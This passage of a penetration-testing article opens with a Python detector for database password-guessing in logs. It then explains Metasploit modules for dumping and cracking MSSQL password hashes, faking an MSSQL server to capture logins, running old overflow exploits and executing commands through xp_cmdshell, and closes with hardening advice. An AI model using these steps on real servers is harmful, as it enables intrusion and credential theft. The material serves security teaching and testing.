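    r"^(?P<ts>\d{4}-\d{2}-\d{2} \d{2}:\d{2}:\d{2})\.\d+ Logon\s+Login failed for user "
    r"'(?P<user>[^']*)'.*\[CLIENT: (?P<src>[^\]]+)\]")


def parse_failed_login(line):
    """Return (timestamp, source address, username) for a failed login, else None."""
    m = MYSQL_RE.match(line)
    if m:
        return (datetime.strptime(m["ts"].replace("  ", " "), "%y%m%d %H:%M:%S"),
                m["src"], m["user"])
    m = MSSQL_RE.match(line)
    if m:
        return datetime.strptime(m["ts"], "%Y-%m-%d %H:%M:%S"), m["src"], m["user"]
    return None


def detect_guessing(lines, window=timedelta(seconds=60), max_failures=10, max_users=3):
    """Keep a sliding window of failures per source address and alert once per
    source when the volume is too high ("volume") or when more distinct
    usernames fail than a typo would explain ("user-sweep", a USER_FILE run)."""
    recent = defaultdict(deque)          # source -> deque of (ts, user) inside the window
    alerted, alerts = set(), []
    for line in lines:
        parsed = parse_failed_login(line)
        if parsed is None:
            continue                     # not a failed login; ignore
        ts, src, user = parsed
        q = recent[src]
        q.append((ts, user))
        while ts - q[0][0] > window:     # expire entries older than the window
            q.popleft()
        users = {u for _, u in q}
        kind = None
        if len(q) >= max_failures:
            kind = "volume"
        elif len(users) >= max_users:
            kind = "user-sweep"
        if kind and (src, kind) not in alerted:
            alerted.add((src, kind))
            alerts.append({"source": src, "kind": kind, "first_seen": q[0][0],
                           "failures": len(q), "users": sorted(users)})
    return alerts


# Constructed log lines (not output from the article's lab): a blank-password
# and username-as-password pair plus a username sweep against MySQL, one stray
# mistyped password, and a dozen rapid 'sa' failures against SQL Server.
SAMPLE_LOG = [
    "130218 10:15:01 [Warning] Access denied for user 'root'@'192.168.200.10' (using password: NO)",
    "130218 10:15:01 [Warning] Access denied for user 'root'@'192.168.200.10' (using password: YES)",
    "130218 10:15:02 [Warning] Access denied for user 'admin'@'192.168.200.10' (using password: YES)",
    "130218 10:15:02 [Warning] Access denied for user 'mysql'@'192.168.200.10' (using password: YES)",
    "130218 10:20:00 [Warning] Access denied for user 'alice'@'192.168.200.55' (using password: YES)",
] + [
    f"2013-02-18 10:30:{s:02d}.12 Logon       Login failed for user 'sa'. Reason: Password did "
    f"not match that for the login provided. [CLIENT: 192.168.200.10]" for s in range(12)
]

if __name__ == "__main__":
    for a in detect_guessing(SAMPLE_LOG):
        print(f"{a['source']} {a['kind']} from {a['first_seen']}: "
              f"{a['failures']} failures, users {a['users']}")
```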

Dump MSSQL Password Hashes

mssql_hashdump extracts the usernames and encrypted password hashes from a MSSQL server and stores them for later cracking with jtr_mssql_fast. This module also saves information about the server version and table names, which can be used to seed the wordlist. The module is located in auxiliary/scanner/mssql. To use it, set the RHOSTS option to our target's IP address and increase the THREADS value to 50. If you have managed to reveal the root password then set also the USERNAME and PASSWORD options. Run the module! (Figure 22)

Cracking MSSQL passwords with John The Ripper

Metasploit offers the module jtr_mssql_fast. This module works in the same manner as jtr_mysql_fast does. It uses John the Ripper to identify weak passwords that have been acquired from the mssql_hashdump module. After having acquired MSSQL encrypted hashes with the mssql_hashdump module, load jtr_mssql_fast and run it:

use auxiliary/analyze/jtr_mssql_fast
run

You should set the Wordlist option, which is the path to your desired password list (Figure 23).

Getting Microsoft SQL Server schema

Metasploit offers the module mssql_schemadump to retrieve the MSSQL schema. mssql_schemadump is located under auxiliary/scanner/mssql. This module attempts to extract the schema from a MSSQL Server instance. It will disregard builtin and example DBs such as master, model, msdb, and tempdb. The module will create a note for each DB found, and store YAML formatted output as loot for easy reading. To use it you have to set the RHOSTS, USERNAME and PASSWORD options. If you are scanning more than one host, increase the THREADS value to get results faster.

Figure 21. mssql_login options
Figure 22. mssql_hashdump module
Figure 23. jtr_mssql_fast module options

Phishing with MSSQL

Metasploit also has an MSSQL capture module, called mssql. This module provides a fake MSSQL service that is designed to capture MSSQL server authentication credentials. The module supports both the weakly encoded database logins as well as Windows logins (NTLM). To select the capture module type:

use auxiliary/server/capture/mssql

You can set the CAINPWFILE option to store captured hashes in Cain & Abel format or JOHNPWFILE to store hashes in John the Ripper format. Leave the SRVHOST option as it is, 0.0.0.0, to listen on the local host. You can configure the module to use SSL (Figure 24). Run the module and connect to the capture MSSQL server from another computer on the network to see how it works. To connect to a MSSQL server open your Microsoft SQL Server Management Studio and try to log in to the running service (Figure 25). Metasploit has captured the username and the password the user entered to log in to the fake MSSQL service.

Exploiting the Microsoft world

Metasploit offers some MSSQL exploits. Let's take a look.

SQL Server 2000

SQL Server 2000 is a very old version of Microsoft SQL Server and it is hard to find it in production environments nowadays. ms02_039_slammer exploits a resolution service buffer overflow. This overflow is triggered by sending a UDP packet to port 1434 which starts with 0x04 and is followed by a long string terminating with a colon and a number. To select it for use simply type:

use exploit/windows/mssql/ms02_039_slammer

Another exploit module for SQL Server 2000 is ms02_056_hello. ms02_056_hello is an exploit which will send malformed data to TCP port 1433 to overflow a buffer and possibly execute code on the server with SYSTEM level privileges. To select it, type:

use exploit/windows/mssql/ms02_056_hello

SQL Server 2000 – SQL Server 2005

ms09_004_sp_replwritetovarbin and ms09_004_sp_replwritetovarbin_sqli exploit a heap-based buffer overflow that occurs when calling the undocumented "sp_replwritetovarbin" extended stored procedure. This vulnerability affects all versions of Microsoft SQL Server 2000 and 2005, Windows Internal Database, and Microsoft Desktop Engine without the updates supplied in MS09-004. Microsoft patched this vulnerability in SP3 for 2005. To use these exploits you type:

use exploit/windows/mssql/ms09_004_sp_replwritetovarbin

or

use exploit/windows/mssql/ms09_004_sp_replwritetovarbin_sqli

Figure 24. mssql capture module options
Figure 25. Login attempt captured by mssql capture module
Figure 26. ms09_004_sp_replwritetovarbin_sqli module options

As with any Metasploit module, you can type

show options

to get a list of available options (Figure 26). Type

show payloads

to get a list of available payloads for the selected exploit.

SQL Server database systems

Metasploit offers the module exploit/windows/mssql/mssql_payload, which executes an arbitrary payload on a Microsoft SQL Server by using the "xp_cmdshell" stored procedure. Three delivery methods are supported. The original method uses Windows 'debug.com'. Since this method invokes ntvdm, it is not available on x86_64 systems. A second method takes advantage of the Command Stager subsystem. This allows using various techniques, such as using a TFTP server, to send the executable. By default the Command Stager uses 'wscript.exe' to generate the executable on the target. Finally, ReL1K's latest method utilizes PowerShell to transmit and recreate the payload on the target. Another interesting exploit module that can be applied to all SQL Server versions is exploit/windows/mssql/mssql_payload_sqli. This module will execute an arbitrary payload on a Microsoft SQL Server, using a SQL injection vulnerability. Once a vulnerability is identified this module will use xp_cmdshell to upload and execute Metasploit payloads. It is necessary to specify the exact point where the SQL injection vulnerability happens. You should use a "reverse" payload on port 80 or on any other outbound port allowed on the firewall.

From inside

Metasploit offers various modules that will assist you to enumerate a MSSQL service, execute SQL queries, retrieve useful data and much more. All you need is a valid user-password pair. mssql_enum will perform a series of configuration audits and security checks against a Microsoft SQL Server database. mssql_sql and mssql_sql_file will allow simple SQL statements to be executed against a MSSQL/MSDE instance, or multiple SQL queries contained within a specified file. To select them, type:

use auxiliary/admin/mssql/mssql_enum

or

use auxiliary/admin/mssql/mssql_sql

or

use auxiliary/admin/mssql/mssql_sql_file

and execute the following command to see the options (Figure 27):

show options

Sample Data

There is an amazing module called mssql_findandsampledata. This module will search through all of the non-default databases on the SQL Server for columns that match the keywords defined in the TSQL KEYWORDS option. If column names are found that match the defined keywords and data is present in the associated tables, the module will select a sample of the records from each of the affected tables. You have to set the sample size by configuring the SAMPLE_SIZE option. Your results will be stored in CSV format. Type

use auxiliary/admin/mssql/mssql_findandsampledata

and

show options

Executing Windows Commands

If you have managed to find a valid username-password pair, the most desired thing that you would like to do is to execute a command on the compromised machine. Metasploit offers the module auxiliary/admin/mssql/mssql_exec which will execute a Windows command on a MSSQL/MSDE instance via the xp_cmdshell procedure. All you need is the username and password!!

Data mining

If you need to search for specific information in SQL Server databases there is a module that can make your life easier. Its name is mssql_idf, and you will find it under auxiliary/admin/mssql/. This module will search the specified MSSQL server for 'interesting' columns and data. The module works against SQL Server 2005 and SQL Server 2008 (Figure 29).

Figure 27. mssql_sql_file module options
Figure 28. mssql_findandsampledata module options
Figure 29. mssql_idf module options

Conclusion

Databases are the most important part of today's computing systems. They usually contain all the information needed to run a company or organization. Therefore it is necessary for them to be as safe as possible. The Metasploit framework is just one tool of many out there that offers the appropriate scripts to compromise a database system. Databases are software that must be accessed by applications running on the Internet; that's why they must be guarded by firewalls, use encryption and powerful passwords, and the whole system (database and operating system) must be checked every day for new updates and upgrades. The best choice would be to allow access to your database only from your intranet and/or VPN. Try not to expose your database directly to the web. Close all your database system ports now!

George Karpouzas

George Karpouzas is the co-founder and owner of WEBNETSOFT, a software development, computer security and IT services company in Greece. He has been working as a software developer for the past seven years. He is a penetration tester, security researcher, information security consultant and software developer at WEBNETSOFT. He holds a Bachelor of Science in computer science from Athens University of Economics and Business. You can find the answers to any security questions on his blog http://securityblog.gr.
